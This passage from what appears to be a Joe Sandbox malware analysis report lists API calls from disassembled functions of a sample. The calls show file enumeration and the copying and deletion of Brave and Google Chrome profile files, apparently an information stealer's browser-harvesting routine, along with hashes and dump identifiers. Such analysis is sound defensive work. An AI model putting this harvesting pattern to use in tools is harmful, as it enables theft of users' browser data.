                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090195B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901966
                        • lstrlen.KERNEL32(\*.*), ref: 00901971
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090198E
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0090199A
                          • Part of subcall function 00924040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0092406D
                          • Part of subcall function 00924040: lstrcpy.KERNEL32(00000000,?), ref: 009240A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009019C3
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901A0E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901A16
                        • lstrlen.KERNEL32(00931794), ref: 00901A21
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A41
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901A4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A76
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901A81
                        • lstrlen.KERNEL32(00931794), ref: 00901A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AAC
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901AB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901ADE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901AE9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901B11
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00901B45
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 00901B70
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00901B8A
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901BC4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901BFB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901C03
                        • lstrlen.KERNEL32(00931794), ref: 00901C0E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C31
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901C3D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901C69
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901C74
                        • lstrlen.KERNEL32(00931794), ref: 00901C7F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901CA2
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901CAE
                        • lstrlen.KERNEL32(?), ref: 00901CBB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901CDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00901CE9
                        • lstrlen.KERNEL32(00931794), ref: 00901CF4
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901D14
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901D20
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901D46
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901D51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901D7D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901DE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901DEB
                        • lstrlen.KERNEL32(00931794), ref: 00901DF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901E19
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901E25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901E4B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00901E56
                        • lstrlen.KERNEL32(00931794), ref: 00901E61
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901E81
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00901E8D
                        • lstrlen.KERNEL32(?), ref: 00901E9A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901EBA
                        • lstrcat.KERNEL32(00000000,?), ref: 00901EC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901EF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901F3E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00901F45
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00901F9F
                        • lstrlen.KERNEL32(015E88C8), ref: 00901FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00901FE3
                        • lstrlen.KERNEL32(00931794), ref: 00901FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090200E
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00902042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090204D
                        • lstrlen.KERNEL32(00931794), ref: 00902058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00902075
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00902081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                        • String ID: \*.*
                        • API String ID: 4127656590-1173974218
                        • Opcode ID: 59ec256fb7c0348062c3c26fe57106bf26704e9574a7f0ef8a8dc01dce5db74b
                        • Instruction ID: 87fff58551de5e805252c4308bd3179c5e7a5fd8be65b53eaef8160cae589c6c
                        • Opcode Fuzzy Hash: 59ec256fb7c0348062c3c26fe57106bf26704e9574a7f0ef8a8dc01dce5db74b
                        • Instruction Fuzzy Hash: 5C925E31A1161A9FCB21EFA8DE88BAE77BDAF84704F144124F815A7291DF74DD05CBA0
                        Function 0090DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DBEF
                        • lstrlen.KERNEL32(00934CA8), ref: 0090DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC17
                        • lstrcat.KERNEL32(00000000,00934CA8), ref: 0090DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DC4C
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DC8F
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0090DCD0
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0090DCF0
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 0090DD0A
                        • lstrlen.KERNEL32(0092CFEC), ref: 0090DD1D
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DD7B
                        • lstrlen.KERNEL32(00931794), ref: 0090DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDA3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DDAF
                        • lstrlen.KERNEL32(?), ref: 0090DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0090DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DE19
                        • lstrlen.KERNEL32(00931794), ref: 0090DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DE6F
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DE7B
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DEBB
                        • lstrlen.KERNEL32(00931794), ref: 0090DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090DEE6
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DEF2
                        • lstrlen.KERNEL32(015E8A08), ref: 0090DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFA5
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090DFB1
                        • lstrlen.KERNEL32(015E8BC8), ref: 0090DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090DFF4
                        • lstrlen.KERNEL32(00931794), ref: 0090DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E022
                        • lstrcat.KERNEL32(00000000,00931794), ref: 0090E02E
                        • lstrlen.KERNEL32(015E8A08), ref: 0090E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0090E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0090E0E7
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E11F
                        • lstrlen.KERNEL32(015EE368), ref: 0090E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0090E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E19F
                        • lstrcat.KERNEL32(00000000), ref: 0090E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0090E1F9
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E22F
                        • lstrlen.KERNEL32(015E88C8), ref: 0090E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E261
                        • lstrcat.KERNEL32(00000000,015E88C8), ref: 0090E269
                        • lstrlen.KERNEL32(\Brave\Preferences), ref: 0090E274
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E29B
                        • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0090E2A7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E2CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E30F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E349
                        • DeleteFileA.KERNEL32(?), ref: 0090E381
                        • StrCmpCA.SHLWAPI(?,015EE458), ref: 0090E3AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E3F4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E41C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E445
                        • StrCmpCA.SHLWAPI(?,015E8A08), ref: 0090E468
                        • StrCmpCA.SHLWAPI(?,015E8BC8), ref: 0090E47D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E4D9
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0090E4E0
                        • StrCmpCA.SHLWAPI(?,015EE398), ref: 0090E58E
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090E5C4
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0090E639
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E678
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E6A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E6C7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E70E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E737
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E75C
                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0090E776
                        • DeleteFileA.KERNEL32(?), ref: 0090E7D2
                        • StrCmpCA.SHLWAPI(?,015E8978), ref: 0090E7FC
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E88C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E8B5
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E8EE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090E916
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090E952
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 2635522530-726946144
                        • Opcode ID: 75279a63d9149a7569ca74ad10297be92a8b881b6bfc31335f3ce0bef95e5e87
                        • Instruction ID: 3dab3f926aacea8380b8d5858cdac1d4e2839cadfe66f3f9ea03fbd6625b1586
                        • Opcode Fuzzy Hash: 75279a63d9149a7569ca74ad10297be92a8b881b6bfc31335f3ce0bef95e5e87
                        • Instruction Fuzzy Hash: BE928E71A112169FCB21EFB8DD89AAE77B9AF84300F144928F816A72D1DF74DC45CB90
                        Function 009118A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009118D2
                        • lstrlen.KERNEL32(\*.*), ref: 009118DD
                        • lstrcpy.KERNEL32(00000000,?), ref: 009118FF
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0091190B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911932
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00911947
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 00911967
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00911981
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009119BF
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009119F2
                        • lstrcpy.KERNEL32(00000000,?), ref: 00911A1A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911A25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911A4C
                        • lstrlen.KERNEL32(00931794), ref: 00911A5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911A80
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911AB4
                        • lstrlen.KERNEL32(?), ref: 00911AC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911AE5
                        • lstrcat.KERNEL32(00000000,?), ref: 00911AF3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911B19
                        • lstrlen.KERNEL32(015E89F8), ref: 00911B2F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911B59
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911B64
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911B8F
                        • lstrlen.KERNEL32(00931794), ref: 00911BA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911BC3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911BCF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911BF8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911C25
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911C30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911C57
                        • lstrlen.KERNEL32(00931794), ref: 00911C69
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911C8B
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911C97
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911CC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911CEF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911CFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911D21
                        • lstrlen.KERNEL32(00931794), ref: 00911D33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911D55
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911D61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911D8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911DB9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00911DC4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911DED
                        • lstrlen.KERNEL32(00931794), ref: 00911E19
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911E36
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911E42
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911E68
                        • lstrlen.KERNEL32(015EE470), ref: 00911E7E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911EB2
                        • lstrlen.KERNEL32(00931794), ref: 00911EC6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911EE3
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911EEF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911F15
                        • lstrlen.KERNEL32(015EF030), ref: 00911F2B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911F5F
                        • lstrlen.KERNEL32(00931794), ref: 00911F73
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911F90
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00911F9C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00911FC2
                        • lstrlen.KERNEL32(015DA5A0), ref: 00911FD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912000
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091200B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912036
                        • lstrlen.KERNEL32(00931794), ref: 00912048
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912067
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00912073
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912098
                        • lstrlen.KERNEL32(?), ref: 009120AC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009120D0
                        • lstrcat.KERNEL32(00000000,?), ref: 009120DE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912103
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091213F
                        • lstrlen.KERNEL32(015EE368), ref: 0091214E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00912176
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00912181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                        • String ID: \*.*
                        • API String ID: 712834838-1173974218
                        • Opcode ID: 16604fbccb7205195482253b8e239d337563d9faaa9dda877279865ae1206a9a
                        • Instruction ID: 05143456270b08d1339e743f3a0f867484561c8884bc69cba6d55fc6536caf30
                        • Opcode Fuzzy Hash: 16604fbccb7205195482253b8e239d337563d9faaa9dda877279865ae1206a9a
                        • Instruction Fuzzy Hash: 59628F30A1161AAFCB22AF68DD88BEE77BDAF84700F140524F916A7291DF74DD45CB90
                        Function 00913910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0091392C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00913943
                        • StrCmpCA.SHLWAPI(?,009317A0), ref: 0091396C
                        • StrCmpCA.SHLWAPI(?,009317A4), ref: 00913986
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009139BF
                        • lstrcpy.KERNEL32(00000000,?), ref: 009139E7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009139F2
                        • lstrlen.KERNEL32(00931794), ref: 009139FD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913A1A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913A26
                        • lstrlen.KERNEL32(?), ref: 00913A33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913A53
                        • lstrcat.KERNEL32(00000000,?), ref: 00913A61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913A8A
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00913ACE
                        • lstrlen.KERNEL32(?), ref: 00913AD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B05
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913B10
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B36
                        • lstrlen.KERNEL32(00931794), ref: 00913B48
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B6A
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913B76
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913B9E
                        • lstrlen.KERNEL32(?), ref: 00913BB2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913BD2
                        • lstrcat.KERNEL32(00000000,?), ref: 00913BE0
                        • lstrlen.KERNEL32(015E88C8), ref: 00913C0B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913C31
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913C3C
                        • lstrlen.KERNEL32(015E89F8), ref: 00913C5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913C84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913C8F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913CB7
                        • lstrlen.KERNEL32(00931794), ref: 00913CC9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913CE8
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913CF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913D1A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00913D47
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913D52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913D79
                        • lstrlen.KERNEL32(00931794), ref: 00913D8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913DAD
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913DB9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913DE2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913E11
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913E1C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913E43
                        • lstrlen.KERNEL32(00931794), ref: 00913E55
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913E77
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913E83
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913EAC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913EDB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00913EE6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913F0D
                        • lstrlen.KERNEL32(00931794), ref: 00913F1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913F41
                        • lstrcat.KERNEL32(00000000,00931794), ref: 00913F4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913F75
                        • lstrlen.KERNEL32(?), ref: 00913F89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913FA9
                        • lstrcat.KERNEL32(00000000,?), ref: 00913FB7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00913FE0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091401F
                        • lstrlen.KERNEL32(015EE368), ref: 0091402E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914056
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00914061
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091408A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009140CE
                        • lstrcat.KERNEL32(00000000), ref: 009140DB
                        • FindNextFileA.KERNEL32(00000000,?), ref: 009142D9
                        • FindClose.KERNEL32(00000000), ref: 009142E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
